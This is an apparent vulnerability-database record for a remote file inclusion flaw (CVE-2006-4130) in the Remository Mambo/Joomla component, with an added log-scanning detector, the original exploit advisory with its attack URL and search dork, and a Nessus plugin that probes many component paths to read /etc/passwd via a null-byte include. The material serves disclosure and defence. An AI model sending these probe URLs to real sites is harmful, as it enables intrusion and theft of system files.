Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion
2006-08-10T07:35:23
ID: OSVDB:27903
Type: osvdb
Reporter: OSVDB
Modified: 2006-08-10T07:35:23
Description
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
Solution Description
Upgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
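To spot attempts against this component on a server you defend, here is an added example (not from the OSVDB record or the Remository project): a Python checker that parses access-log lines in Combined Log Format, URL-decodes the mosConfig_absolute_path value, and flags a remote URL (the inclusion described above), a null-byte local include (the probe form used by the Nessus plugin referenced on this page) or a traversal sequence. The log lines are constructed samples, and the regex, labels and scheme list are my own assumptions.

```python
"""Flag requests that abuse the Remository 'mosConfig_absolute_path' parameter.

Added detection example; the log lines below are constructed, not real traffic.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format:
# host ident user [time] "METHOD target HTTP/x" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

PARAM = "mosConfig_absolute_path"

# Prefixes that PHP's include() would fetch remotely or feed through a stream
# wrapper; a legitimate value is an absolute filesystem path, never one of these.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://",
                  "data:", "expect://", "zip://", "phar://")

# Constructed sample log lines (RFC 5737 documentation addresses).
LOG_LINES = [
    '203.0.113.7 - - [10/Aug/2006:07:35:23 +0000] "GET /joomla/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh? HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [10/Aug/2006:07:36:01 +0000] "GET /joomla/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=/etc/passwd%00 HTTP/1.0" 200 1843 "-" "Nessus"',
    '198.51.100.2 - - [10/Aug/2006:08:00:00 +0000] "GET /joomla/index.php?option=com_remository&Itemid=31 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Aug/2006:08:01:00 +0000] "GET /joomla/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%2568%2574%2574%2570%253a%252f%252fhuh HTTP/1.0" 500 0 "-" "curl/7.15"',
]


def classify_value(value: str) -> Optional[str]:
    """Return a finding label for a decoded parameter value, or None if benign."""
    v = unquote(value)          # second decode catches double-encoded payloads
    low = v.lower()
    if any(low.startswith(s) for s in REMOTE_SCHEMES):
        return "remote-file-include"
    if "\x00" in v:             # e.g. /etc/passwd%00 truncation probe
        return "null-byte-local-include"
    if "../" in v or "..\\" in v:
        return "path-traversal"
    return None


def scan_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return a finding dict or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes each value once (so %00 becomes a real NUL).
    for key, val in parse_qsl(parts.query, keep_blank_values=True):
        if key != PARAM:
            continue
        label = classify_value(val)
        if label:
            return {"host": m.group("host"), "path": parts.path,
                    "status": int(m.group("status")),
                    "finding": label, "value": unquote(val)}
    return None


def scan_log(lines) -> list:
    """Run scan_line over an iterable of log lines and collect the findings."""
    return [f for f in (scan_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(f"{finding['host']} {finding['finding']} -> {finding['value']!r} "
              f"({finding['path']}, HTTP {finding['status']})")
```

A non-200 status does not mean the attempt failed: with register_globals on, the include runs before the component produces any output, so correlate findings with outbound connections from the web server and with new files in the web root.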
Vendor URL: http://www.remository.com/
Secunia Advisory ID: 21477
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html
FrSIRT Advisory: ADV-2006-3270
CVE-2006-4130
Bugtraq ID: 19465
{"edition": 1, "title": "Remository for Mambo admin.remository.php mosConfig_absolute_path Variable Remote File Inclusion", "bulletinFamily": "software", "published": "2006-08-10T07:35:23", "lastseen": "2017-04-28T13:20:24", "modified": "2006-08-10T07:35:23", "reporter": "OSVDB", "viewCount": 61, "href": "https://vulners.com/osvdb/OSVDB:27903", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 3.26 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Manual Testing Notes\nhttp://[target]/[joomlapath]/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?\n## References:\nVendor URL: http://www.remository.com/\n[Secunia Advisory ID:21477](https://secuniaresearch.flexerasoftware.com/advisories/21477/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0198.html\nFrSIRT Advisory: ADV-2006-3270\n[CVE-2006-4130](https://vulners.com/cve/CVE-2006-4130)\nBugtraq ID: 19465\n", "affectedSoftware": [], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-28T13:20:24", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4130"]}, {"type": "exploitdb", "idList": ["EDB-ID:2172"]}, {"type": "nessus", "idList": ["MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL"]}], "modified": "2017-04-28T13:20:24", "rev": 2}, "vulnersScore": 6.3}, "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "cvelist": ["CVE-2006-4130"], "id": "OSVDB:27903"}
{"cve": [{"lastseen": "2020-12-09T19:23:47", "description": "PHP remote file inclusion vulnerability in admin.remository.php in the Remository Component (com_remository) 3.25 and earlier for Mambo and Joomla!, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 5, "cvss3": {}, "published": "2006-08-14T23:04:00", "title": "CVE-2006-4130", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4130"], "modified": "2018-10-17T21:33:00", "cpe": ["cpe:/a:matt_smith:remository_for_mambo:3.25"], "id": "CVE-2006-4130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4130", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:matt_smith:remository_for_mambo:3.25:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T15:40:51", "description": "Mambo Remository Component <= 3.25 Remote Include Vulnerability. CVE-2006-4130. Webapps exploit for php platform", "published": "2006-08-10T00:00:00", "type": "exploitdb", "title": "Mambo Remository Component <= 3.25 - Remote Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4130"], "modified": "2006-08-10T00:00:00", "id": "EDB-ID:2172", "href": "https://www.exploit-db.com/exploits/2172/", "sourceData": " .:[ insecurity research team ]:.\n .__..____.:.______.____.:.____ .\n .:. | |/ \\:/ ___// __ \\:/ _\\.:.\n : | | | \\\\____\\\\ ___/\\ /__ :. 
.\n ..: |__|___| /____ >\\___ >\\___ >.:\n .:.. .. .\\/ .:\\/:. .\\/. .:\\/:\n . ...:. .advisory. .:...\n :..................: o9.o8.2oo6 ..\n \n \n Affected Application: Remository v3.25 \n\n (Mambo/Joomla CMS Component)\n \n \n . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n Discoverd by: camino\n \n Team: Insecurity Research Team\n \n URL: http://www.insecurityresearch.org\n \n E-Mail: camino@sexmagnet.com\n \n \n \n . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .\n \n \n Typ: Remote [x] Local [ ]\n \n Remote File Inclusion [x] SQL Injection [ ]\n \n Level: Low [ ] Middle [x] High [ ]\n \n Application: Remository\n \n Version: 3.25\n \n Vulnerable File: admin.remository.php\n \n URL: http://www.remository.com\n \n Description: It's a component that works with Mambo CMS 4.5+ to \n\n provide a selection of files that users can download. \n \n Dork: intext:\"Remository 3.25. is technology by Black Sheep Research\"\n\n inurl:\"com_remository\"\n \n \n \n . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n http://[sitepath]/[joomlapath]/administrator/components/\n\n com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?\n \n \n \n . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n o1.) open admin.remository.php\n \n o2.) take a look at line 16:\n\n require_once ($mosConfig_absolute_path.'/components/\n\n com_remository/com_remository_constants.php');\n \n o3.) take a look at line 19:\n\n defined( '_VALID_MOS' ) or die( 'Direct Access to this location \n \n is not allowed.' );\n \n o4.) exchange line 19 with line 16!\n \n \n \n . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . 
.\n \n \n all the sexy members of insecurity research team ;-)\n\n# milw0rm.com [2006-08-10]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2172/"}], "nessus": [{"lastseen": "2021-01-20T12:09:16", "description": "A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2006-07-15T00:00:00", "title": "Mambo / Joomla! 
Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "modified": "2006-07-15T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/22049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22049);\n script_version(\"1.110\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2006-3396\",\n \"CVE-2006-3530\",\n \"CVE-2006-3556\",\n \"CVE-2006-3748\",\n \"CVE-2006-3749\",\n \"CVE-2006-3750\",\n \"CVE-2006-3751\",\n \"CVE-2006-3773\",\n \"CVE-2006-3774\",\n \"CVE-2006-3846\",\n \"CVE-2006-3947\",\n \"CVE-2006-3949\",\n \"CVE-2006-3980\",\n \"CVE-2006-3995\",\n \"CVE-2006-4074\",\n \"CVE-2006-4130\",\n \"CVE-2006-4195\",\n \"CVE-2006-4270\",\n \"CVE-2006-4288\",\n \"CVE-2006-4553\",\n \"CVE-2006-4858\",\n \"CVE-2006-5045\",\n \"CVE-2006-5048\",\n \"CVE-2006-5519\",\n \"CVE-2006-6962\",\n \"CVE-2007-1702\",\n \"CVE-2007-2005\",\n \"CVE-2007-2144\",\n \"CVE-2007-2319\",\n \"CVE-2007-3130\",\n \"CVE-2007-5310\",\n 
\"CVE-2007-5412\",\n \"CVE-2007-5457\",\n \"CVE-2008-0567\",\n \"CVE-2008-5789\",\n \"CVE-2008-5790\",\n \"CVE-2008-5793\",\n \"CVE-2008-6841\",\n \"CVE-2010-2918\"\n );\n script_bugtraq_id(\n 18705,\n 18808,\n 18876,\n 18919,\n 18924,\n 18968,\n 18991,\n 19037,\n 19042,\n 19044,\n 19047,\n 19100,\n 19217,\n 19222,\n 19223,\n 19224,\n 19233,\n 19373,\n 19465,\n 19505,\n 19574,\n 19581,\n 19725,\n 20018,\n 20667,\n 23125,\n 23408,\n 23490,\n 23529,\n 24342,\n 25959,\n 26002,\n 26044,\n 27531,\n 28942,\n 30093,\n 32190,\n 32192,\n 32194\n );\n script_xref(name:\"EDB-ID\", value:\"1959\");\n script_xref(name:\"EDB-ID\", value:\"2020\");\n script_xref(name:\"EDB-ID\", value:\"2023\");\n script_xref(name:\"EDB-ID\", value:\"2029\");\n script_xref(name:\"EDB-ID\", value:\"2083\");\n script_xref(name:\"EDB-ID\", value:\"2089\");\n script_xref(name:\"EDB-ID\", value:\"2125\");\n script_xref(name:\"EDB-ID\", value:\"2196\");\n script_xref(name:\"EDB-ID\", value:\"2205\");\n script_xref(name:\"EDB-ID\", value:\"2206\");\n script_xref(name:\"EDB-ID\", value:\"2207\");\n script_xref(name:\"EDB-ID\", value:\"2214\");\n script_xref(name:\"EDB-ID\", value:\"2367\");\n script_xref(name:\"EDB-ID\", value:\"2613\");\n script_xref(name:\"EDB-ID\", value:\"3567\");\n script_xref(name:\"EDB-ID\", value:\"3703\");\n script_xref(name:\"EDB-ID\", value:\"3753\");\n script_xref(name:\"EDB-ID\", value:\"4497\");\n script_xref(name:\"EDB-ID\", value:\"4507\");\n script_xref(name:\"EDB-ID\", value:\"4521\");\n script_xref(name:\"EDB-ID\", value:\"5020\");\n script_xref(name:\"EDB-ID\", value:\"5497\");\n script_xref(name:\"EDB-ID\", value:\"6003\");\n script_xref(name:\"EDB-ID\", value:\"7038\");\n script_xref(name:\"EDB-ID\", value:\"7039\");\n script_xref(name:\"EDB-ID\", value:\"7040\");\n\n script_name(english:\"Mambo / Joomla! 
Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities\");\n script_summary(english:\"Attempts to read a local file using Mambo / Joomla components and modules.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439035/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439451/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439618/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439963/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439997/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/440881/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441533/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441538/30/0/threaded\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441541/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/444425/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0607-exploits/smf.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the PHP 'register_globals' setting or contact the product's\nvendor to see if an upgrade exists.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Extcalendar RFI\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mambo_detect.nasl\", \"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\n# Generate a list of paths to check.\nmambo = get_dirs_from_kb(appname:'mambo_mos', port:port);\nif (isnull(mambo)) mambo = make_list();\n\njoomla = make_list();\njoomla_installs = get_installs(\n app_name : \"Joomla!\",\n port : port\n);\n\nif (joomla_installs[0] == IF_OK)\n{\n foreach install (joomla_installs[1])\n {\n dir = install['path'];\n joomla = make_list(dir, joomla);\n }\n}\n\ndirs = make_list(mambo, joomla);\n\nif (max_index(dirs) == 0)\n audit(AUDIT_WEB_APP_NOT_INST, \"Joomla! / Mambo\", port);\n\n# Vulnerable scripts.\n# - components.\nncoms = 0;\ncom = make_array();\n# - A6MamboCredits\ncom[ncoms++] = \"/administrator/components/com_a6mambocredits/admin.a6mambocredits.php\";\n# - Art*Links\ncom[ncoms++] = \"/components/com_artlinks/artlinks.dispnew.php\";\n# - Chrono Forms\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS/File.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php\";\n# - Clickheat\ncom[ncoms++] = \"/administrator/components/com_clickheat/install.clickheat.php\";\ncom[ncoms++] = 
\"/administrator/components/com_clickheat/includes/heatmap/_main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/overview/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php\";\n# - Community Builder\ncom[ncoms++] = \"/administrator/components/com_comprofiler/plugin.class.php\";\n# - Coppermine Photo Gallery\ncom[ncoms++] = \"/components/com_cpg/cpg.php\";\n# - DBQ Manager\ncom[ncoms++] = \"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php\";\n# - ExtCalendar\ncom[ncoms++] = \"/components/com_extcalendar/extcalendar.php\";\n# - Feederator\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/subscription.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/tmsp.php\";\n# - Galleria\ncom[ncoms++] = \"/components/com_galleria/galleria.html.php\";\n# - Hashcash\ncom[ncoms++] = \"/components/com_hashcash/server.php\";\n# - HTMLArea3\ncom[ncoms++] = \"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php\";\n# - JD-Wiki\ncom[ncoms++] = \"/components/com_jd-wiki/lib/tpl/default/main.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/dwpage.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/wantedpages.php\";\n# - Joomla Flash Uploader\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php\";\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php\";\n# - 
JoomlaPack\ncom[ncoms++] = \"/administrator/components/com_jpack/includes/CAltInstaller.php\";\n# - Joomla-Visites\ncom[ncoms++] = \"/administrator/components/com_joomla-visites/core/include/myMailer.class.php\";\n# - Link Directory\ncom[ncoms++] = \"/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php\";\n# - LoudMouth\ncom[ncoms++] = \"/components/com_loudmouth/includes/abbc/abbc.class.php\";\n# - Mambatstaff\ncom[ncoms++] = \"/components/com_mambatstaff/mambatstaff.php\";\n# - MambelFish\ncom[ncoms++] = \"/administrator/components/com_mambelfish/mambelfish.class.php\";\n# - Mambo Gallery Manager\ncom[ncoms++] = \"/administrator/components/com_mgm/help.mgm.php\";\n# - Mosets Tree\ncom[ncoms++] = \"/components/com_mtree/Savant2/Savant2_Plugin_textarea.php\";\n# - mp3_allopass\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass.php\";\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass-error.php\";\n# - Multibanners\ncom[ncoms++] = \"/administrator/components/com_multibanners/extadminmenus.class.php\";\n# - PCCookbook\ncom[ncoms++] = \"/components/com_pccookbook/pccookbook.php\";\n# - Peoplebook\ncom[ncoms++] = \"/administrator/components/com_peoplebook/param.peoplebook.php\";\n# - perForms\ncom[ncoms++] = \"/components/com_performs/performs.php\";\n# - phpShop\ncom[ncoms++] = \"/administrator/components/com_phpshop/toolbar.phpshop.html.php\";\n# - PollXT\ncom[ncoms++] = \"/administrator/components/com_pollxt/conf.pollxt.php\";\n# - Recly!Competitions\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/add.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/competitions.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/settings/settings.php\";\n# - Remository\ncom[ncoms++] = \"/administrator/components/com_remository/admin.remository.php\";\n# - rsGallery\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.php\";\ncom[ncoms++] = 
\"/components/com_rsgallery2/rsgallery2.html.php\";\n# - Security Images\ncom[ncoms++] = \"/administrator/components/com_securityimages/configinsert.php\";\ncom[ncoms++] = \"/administrator/components/com_securityimages/lang.php\";\n# - Serverstat\ncom[ncoms++] = \"/administrator/components/com_serverstat/install.serverstat.php\";\n# - SiteMap\ncom[ncoms++] = \"/components/com_sitemap/sitemap.xml.php\";\n# - SMF Forum\ncom[ncoms++] = \"/components/com_smf/smf.php\";\n# - Taskhopper\ncom[ncoms++] = \"/components/com_thopper/inc/contact_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/itemstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/projectstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/request_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/responses_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/timelog_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/urgency_type.php\";\n# - User Home Pages\ncom[ncoms++] = \"/administrator/components/com_uhp/uhp_config.php\";\ncom[ncoms++] = \"/administrator/components/com_uhp2/footer.php\";\n# - VideoDB\ncom[ncoms++] = \"/administrator/components/com_videodb/core/videodb.class.xml.php\";\n# - WmT Portfolio\ncom[ncoms++] = \"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php\";\n# - modules.\nnmods = 0;\nmod = make_array();\n# - Autostand\nmod[nmods++] = \"/mod_as_category.php\";\nmod[nmods++] = \"/mod_as_category/mod_as_category.php\";\n# - FlatMenu\nmod[nmods++] = \"/mod_flatmenu.php\";\n# - MambWeather\nmod[nmods++] = \"/MambWeather/Savant2/Savant2_Plugin_options.php\";\n\n\n# Loop through each directory.\ninfo = \"\";\ncontents = \"\";\nforeach dir (list_uniq(dirs))\n{\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<ncoms; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + com[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], 
w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + com[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n\n for (i=0; i<nmods; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + \"/modules/\" + mod[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + \"/modules/\" + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n}\n\nif (info)\n{\n if (empty_or_null(contents)) contents = 'The response output includes an error message which indicates that the installed component is affected. Below is the response : \\n\\n' + res;\n\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : \"/etc/passwd\",\n request : split(info),\n output : contents,\n attach_type : 'text/plain'\n );\n exit(0);\n}\nelse\n exit(0, \"No affected components were found on the web server on port \"+port+\".\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}